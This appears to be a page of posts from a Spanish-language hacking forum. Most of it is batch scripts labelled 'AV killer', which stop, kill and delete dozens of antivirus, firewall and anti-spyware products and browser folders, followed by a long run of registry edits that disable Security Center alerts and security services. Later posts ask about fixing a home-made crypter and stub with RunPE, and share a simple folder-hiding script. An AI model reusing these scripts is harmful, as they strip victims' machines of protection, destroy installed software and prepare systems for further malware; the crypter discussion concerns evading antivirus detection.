cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal"
net stop "kav"
net stop "kavsvc"
Taskkill /f /IM kav.exe /IM kavsvc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 15
:micanti
cd "C:\Archivos de programa\Microsoft AntiSpyware"
net stop "gcasServ"
net stop "gcasDtServ"
Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe
attrib -H -S -R *.*
del /s /q *.*
goto 14
:Avast4
cd "C:\Archivos de programa\Alwil Software\Avast4"
net stop "aswUpdSv"
net stop "ashServ"
net stop "ashWebSv"
net stop "ashDisp"
Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
attrib -H -S -R *.*
del /s /q *.*
goto 13
:Panda06
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
net stop "TPSrv"
net stop "PavFnSvr"
net stop "pavsrv51"
net stop "pskmssvc"
net stop "AVENGINE"
net stop "PNMSRV"
net stop "PsImSvc"
Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM
PNMSRV.EXE /IM PsImSvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Common Files\Panda Software\PavShld"
Taskkill /f /IM pavprsrv.exe
attrib -H -S -R *.*
del /s /q *.*
goto 12
:norton2
cd "C:\Archivos de programa\Norton AntiVirus"
net stop "navapsvc"
net stop "NPFMntor"
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Norton AntiVirus\IWP"
attrib -H -S -R *.*
del /s /q *.*
goto 11
:norton
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared"
net stop "ccSetMgr"
net stop "SNDSrvc"
net stop "SPBBCSvc"
net stop "ccEvtMgr"
net stop "ccApp"
net stop "symlcsvc"
Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM
symlcsvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC"
attrib -H -S -R *.*
del /s /q *.*
goto 10
:avfree
cd "C:\Archivos de programa\Grisoft\AVG free"
net stop "avgamsvr"
net stop "vgupsvc"
net stop "avgcc"
Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 9
:sinapti
cd "C:\Archivos de programa\Synaptics\SynTP"
net stop "SynTPLpr"
net stop "SynTPEnh"
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
attrib -H -S -R *.*
del /s /q *.*
goto 8
:trend
cd "C:\Archivos de programa\Trend Micro\OfficeScan Client"
net stop "ntrtscan"
net stop "tmlisten"
net stop "OfcPfwSvc"
net stop "pccntmon"
Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe
attrib -H -S -R *.*
del /s /q *.*
goto 7
:zone
cd "C:\Archivos de programa\Zone Labs\ZoneAlarm"
net stop "zlclient"
net stop "zonealarm"
net stop "vsmon"
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\WINDOWS\system32\ZoneLabs"
attrib -H -S -R *.*
del /s /q *.*
goto 6
:mcafee
cd "c:\archivos de programa\mcafee.com\agent"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM
mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe
attrib -H -S -R *.*
del /s /q *.*
rd /s /q "c:\archivos de programa\mcafee.com\agent"
rd /s /q "c:\archivos de programa\mcafee.com"
goto 5
:windefender
cd "C:\Archivos de programa\Windows Defender"
net stop "MsMpEng"
net stop "MSASCui"
Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe
attrib -H -S -R *.*
del /s /q *.*
goto 4
:spybot
cd "C:\Archivos de programa\Spybot - Search & Destroy"
net stop "TeaTimer"
Taskkill /f /IM TeaTimer.exe
attrib -H -S -R *.*
del /s /q *.*
goto 3
:nod32
cd "C:\Archivos de programa\Eset"
net stop "nod32krn"
net stop "nod32kui"
net stop "nod32"
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
attrib -H -S -R *.*
del /s /q *.*
goto 2
:ewido
cd "C:\Archivos de programa\ewido anti-malware"
Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe
net stop "ewidoctrl"
net stop "ewidoguard"
attrib -H -S -R *.*
del /s /q *.*
goto 1
:fin
exit

Otro AV killer:

Código: php

@echo off

net stop "Centro de Seguridad"
net stop "Firewall de Windows/ConexiÃ³n compartida a Internet (ICS)"
Taskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM
NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE
cd c:Archivos de programaArchiv os comunesSymante c Shared
attrib -H -S -R *.*
del /s /q *.*
rd c:Archivos de programaArchiv os comunesSymante c Shared
cd c:Archivos de programaArchiv os comunesSymante c SharedSPBBC
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM symlcsvc.exe
cd C:Archivos de programaArchiv os comunesSymante c SharedCCPD-LC
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM SymWSC.exe /IM UsrPrmpt.exe
cd c:Archivos de programaArchiv os comunesSymante c SharedSecurity Center
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM navapsvc.exe /IM ISSVC.exe /IM
cd c:Archivos de programaNorton Internet Security
attrib -H -S -R *.*
del /s /q *.*
cd c:Archivos de programaNorton Internet SecurityNorton AntiVirus
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM zlcli6ent.exe /IM zo3nealarm.exe
cd C:Archivos de programa*one Labs*oneAlarm
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM ewidoctrl.exe
cd C:Archivos de programaewido anti-malware
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM vsmon.exe
C:WINDOWSsystem3 2*oneLabs
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe
cd C:Archivos de programaNorton AntiVirus
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaNorton AntiVirusIWP
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM NPROTECT.EXE
cd C:Archivos de programaNorton Utilities
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd C:Archivos de programaWebroo tSpy Sweeper
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM
NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe
rd C:Archivos de programaNorton SystemWorksNor ton AntiVirus
Taskkill /f /IM no-spy.exe
cd C:Archivos de programaSinEsp ias
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM spyaxe.exe /IM spyaxe.exe
cd C:Archivos de programaSpyAxe
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM SpywareStrike. exe /IM SpywareStrike. exe
cd C:Archivos de programaSpywar eStrike
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM gcasDtServ.exe /IM gcasServ.exe
cd C:Archivos de programaMicros oft AntiSpyware
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM kavsvc.exe /IM kav.exe
cd C:ARCHIVOS DE PROGRAMAKASPER SKY LABKASPERSKY ANTI-VIRUS PERSONAL
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.exe
cd c:archivos de programamcafee .comagent
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM VsStat.exe
cd C:Archivos de programaMcAfee McAfee VirusScan
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM firefox.exe
cd C:Archivos de programaMozill a Firefox
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd C:Archivos de programaPanda SoftwarePanda Antivirus Titanium
attrib -H -S -R *.*
del /s /q *.*
rd C:Archivos de programaPanda SoftwarePanda Antivirus Titanium
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
cd C:Archivos de programaSynapt icsSynTP
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM FrameworkServi ce.exe /IM Mcshield.exe /IM VsTskMgr.exe /IM SHSTAT.EXE
cd C:Archivos de programaNetwor k AssociatesViru sScan
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaNetwor k AssociatesComm on Framework
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe
cd C:Archivos de programaEset
attrib -H -S -R *.*
del /s /q *.*
rd C:Archivos de programaEset
Taskkill /f /IM AVGSERV9.EXE /IM AVGCC32.EXE
cd C:PROGRAM FILESGRISOFTAV G6
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:Archivos de programaAVPers onal
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM ASHSERV.EXE /IM ASHWEBSV.EXE /IM ASHMAISV.exe
cd C:ARCHIVOS DE PROGRAMAALWIL SOFTWAREAVAST4
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe
cd "cd C:Archivos de programaGrisof t"
attrib -H -S -R *.*
del /s /q *.*
cd "AVGFRE*"
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM IEXPLORE.EXE
cd C:Archivos de programaIntern et Explorer
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe
cd C:Archivos de programaPanda SoftwarePanda Administrator 3Pav_Agent
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaPanda SoftwarePanda Administrator 3Scheduler
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:Archivos de programaSoftwi nBitDefender9
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM xcommsvr.exe /IM livesrv.exe /IM bdss.exe
rd C:Archivos de programaArchiv os comunesSoftwin
Taskkill /f /IM DefWatch.exe /IM Rtvscan.exe
cd C:Archivos de programaSymant ec_Client_Secu ritySymantec AntiVirus
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgamsvr.exe /IM avgupsvc.exe
cd C:Archivos de programaAVG7
attrib -H -S -R *.*
del /s /q *.*
exit

otro:

Código: php

reg add "HKLM\software\microsoft\security center" /v AntiVirusDisableNotify /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v AntiVirusOverride /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v FirewallDisableNotify /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v FirewallOverride /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v FirstRunDisabled /t REG_DWORD /d 4 /f
reg add "HKLM\software\microsoft\security center" /v UpdatesDisableNotify /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\SharedAcce ss" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\SharedAcce ss" /v ErrorControl /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\SharedAcce ss" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\SharedAcce ss" /v ErrorControl /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\SharedAcce ss" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\SharedAcce ss" /v ErrorControl /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\AVPCC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\AVPCC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\AVPCC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Amon" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Amon" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Amon" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Apvxd" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Apvxd" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Apvxd" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Apvxdw in" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Atrack" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Atrack" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Atrack " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\AvconsoleE XE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\AvconsoleE XE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\AvconsoleE XE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\AVG_CC " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\avgcc32" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\avgcc32" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\avgcc3 2" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\avgserv9" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\avgserv9" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\avgser v9" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\BlackI ce Utility" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\CcRegVfy" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\ConfigSafe " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\ConfigSafe " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\ConfigSafe " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\CPD_EX E" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Defwatch" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Defwatch" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Defwat ch" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\dvpapi 9x" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Fix-it" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Fix-it" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Fix-it" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Freedom" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Freedom" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Freedo m" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\F-StopW" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\F-StopW" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\F-StopW" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\iamapp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\iamapp" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\iamapp " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\McAfee Winguage" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\McAfee.Instant Update.Monitor" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\McAfee.Instant Update.Monitor" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\McAfee.Ins tantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\McAfeeVirusSca nService" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\McAfeeVirusSca nService" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\McAfeeViru sScanService" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NAV DefAlert" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\CURRENTcontrolset\services\Nod32C C" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NOD32P OP3" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\ScanInicio " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\ScanInicio " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\ScanInicio " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\SymTra y - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\TrueVector " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\TrueVector " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\TrueVector " /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\VirusS can Online" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset002\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\ZoneAl arm" /v Start /t REG_DWORD /d 4 /f

#10

Dudas y pedidos generales / [SOLUCIONADO] Problema con crypter.

Septiembre 02, 2012, 04:03:24 PM

Hola , Mediante un tuto cree mi crypter y le agrege algunas forma de encryptacion y un nuevo Runpe. Lo que sucede es que compilo el crypter y el stub sin problemas , encripto un anotador y al momento de abrirlo me sale este error:
Stub
Error "13" en tiempo de ejecucion:
No coinciden los tipos
Ya revice el crypter y el stub pero lo veo todo bien , no encuentro la falla
Gracias

#11

Dudas y pedidos generales / [SOLUCIONADO] Sobre vb6

Agosto 26, 2012, 10:27:43 AM

Hola , mi duda es la siguiente: se puede geerar un exe desde source? Es de decir yo compilo un proyecto y al abrir ese proyecto compilado abra otro exe
suponganse creo un programa que al apretar un commandbutton genere otro exe
Se puede hacer?

Pd: alguien sabe que paso con masters hackers? Desaparecio?

#12

Batch - Bash / Proteger tus carpetas

Agosto 25, 2012, 05:10:17 PM

Con este codigo podran ocultar sus carpetas mediante una pw

Ocultar.bat

Código: php


@echo off
if not exist Carpeta (Md Carpeta) else (cls)
Set /p contra=Elija la contraseña:
cls 
set /p pw=Ingrese la pw elegida: 
If %contra%==%pw% (Attrib  +h +s +a Carpeta) else (exit)

Mostrar.bat

Código: php

@echo off
if not exist Carpeta (Md Carpeta) else (cls)
Set /p contra=Elija la contraseña:
cls 
set /p pw=Ingrese la pw elegida: 
If %contra%==%pw% (Attrib  -h -s -a Carpeta) else (exit)

Páginas1